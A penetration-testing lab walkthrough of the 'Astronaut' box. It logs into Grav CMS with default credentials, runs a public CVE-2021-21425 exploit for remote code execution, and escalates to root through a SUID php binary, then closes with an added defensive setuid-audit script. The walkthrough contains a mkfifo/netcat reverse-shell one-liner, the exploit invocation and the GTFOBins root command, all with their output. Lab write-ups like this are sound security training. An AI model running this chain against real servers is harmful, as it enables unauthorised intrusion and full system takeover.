Astronaut - RCE CVE
When testing default credentials, we see that we have gained access to the admin login page.
We proceed by searching for unauthenticated Grav CMS exploits and, as seen below, find a few CVEs.
One of the Google results leads us to the following exploit:
Reference: https://github.com/CsEnox/CVE-2021-21425/blob/main/exploit.py
We download the exploit to our attack machine using wget.
┌──(root㉿kali)-[/home/kali/ugc/gravity]
└─# wget "https://raw.githubusercontent.com/CsEnox/CVE-2021-21425/main/exploit.py"
--2022-08-17 09:25:28--  https://raw.githubusercontent.com/CsEnox/CVE-2021-21425/main/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.110.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1892 (1.8K) [text/plain]
Saving to: ‘exploit.py’

exploit.py 100%[============================================================>] 1.85K --.-KB/s in 0s

2022-08-17 09:25:29 (13.7 MB/s) - ‘exploit.py’ saved [1892/1892]

Now we use the exploit to ping our attack machine.
┌──(root㉿kali)-[/home/kali/ugc/gravity]
└─# python3 exploit.py -c 'ping -c1 192.168.145.128' -t http://192.168.145.160/grav-admin
[] Creating File
Scheduled task created for file creation, wait one minute
[] Running file
Scheduled task created for command, wait one minute

After approximately 1 minute, we receive the ping packets.
┌──(root㉿kali)-[/home/kali]
└─# tcpdump -i eth0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
09:41:01.440075 IP 192.168.145.160 > 192.168.145.128: ICMP echo request, id 2, seq 1, length 64
09:41:01.440111 IP 192.168.145.128 > 192.168.145.160: ICMP echo reply, id 2, seq 1, length 64

Now we will proceed by attempting to get a reverse shell.
We set up a listener on our attack machine.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 4444

Now we update our command as seen below.
┌──(root㉿kali)-[/home/kali/ugc/gravity]
└─# python3 exploit.py -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.145.128 4444 >/tmp/f' -t http://192.168.145.160/grav-admin
[] Creating File
Scheduled task created for file creation, wait one minute
[] Running file
Scheduled task created for command, wait one minute

We receive a response in our listener as www-data.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.145.128] from (UNKNOWN) [192.168.145.160] 40906
sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

We search for any interesting SUID binaries and see /usr/bin/php7.4 in the output.
www-data@gravity:~/html/grav-admin$ find / -perm -u=s -type f 2>/dev/null | grep -v 'snap'
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chfn
/usr/bin/at
/usr/bin/php7.4
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su

Using https://gtfobins.github.io/, we see an entry for PHP and follow the listed steps in order to obtain root access.
www-data@gravity:~/html/grav-admin$ php -r "pcntl_exec('/bin/sh', ['-p']);"
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:1d:44:e8 brd ff:ff:ff:ff:ff:ff
inet 192.168.145.160/24 brd 192.168.145.255 scope global dynamic ens33
valid_lft 1304sec preferred_lft 1304sec
inet6 fe80::20c:29ff:fe1d:44e8/64 scope link
valid_lft forever preferred_lft forever
hostname
gravity
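As an added, defensive example (not part of the original writeup): a small Python audit that walks a filesystem, lists every setuid/setgid file and singles out interpreters such as the php7.4 binary that gave root above. The interpreter and baseline name sets are assumptions chosen to match this box rather than an authoritative distro list, and the sample tree it builds is constructed for the demo.

```python
import os
import stat
import tempfile

# Interpreters and shells: a setuid bit on any of these hands the file owner's
# privileges to every local user, which is how php7.4 above led to root.
INTERPRETERS = {"php", "python", "perl", "ruby", "bash", "sh", "dash", "node", "lua"}

# Constructed baseline of setuid binaries normal on a stock Ubuntu host (taken from
# the writeup's find output, not an authoritative distro list).
EXPECTED_SUID = {
    "sudo", "su", "passwd", "chfn", "chsh", "gpasswd", "newgrp", "mount", "umount",
    "fusermount", "at", "ssh-keysign", "dmcrypt-get-device",
    "dbus-daemon-launch-helper", "polkit-agent-helper-1",
}

def classify(name):
    """'php7.4' -> 'interpreter'; baseline names -> 'expected'; rest -> 'unexpected'."""
    if name.rstrip("0123456789.") in INTERPRETERS:   # strip a trailing version
        return "interpreter"   # hands out the owner's privileges: remove the bit
    if name in EXPECTED_SUID:
        return "expected"
    return "unexpected"        # custom helper, leftover, or planted backdoor

def audit_suid(root):
    """Walk root and return [{name, path, kind}] for each setuid/setgid regular file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)   # lstat: never follow symlinks
            except OSError:
                continue              # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append({"name": fn, "path": path, "kind": classify(fn)})
    return sorted(findings, key=lambda f: f["path"])

def build_sample_tree():
    """Constructed tree: baseline setuid file, setuid interpreter, plain file, odd helper."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, suid in (("php7.4", True), ("passwd", True),
                       ("ls", False), ("backup-helper", True)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o755 | (stat.S_ISUID if suid else 0))
    return root
```

Run `audit_suid("/")` as root for a real host; anything classified "interpreter" or "unexpected" is what the walkthrough's find command surfaced and what a hardening pass should strip with `chmod u-s`.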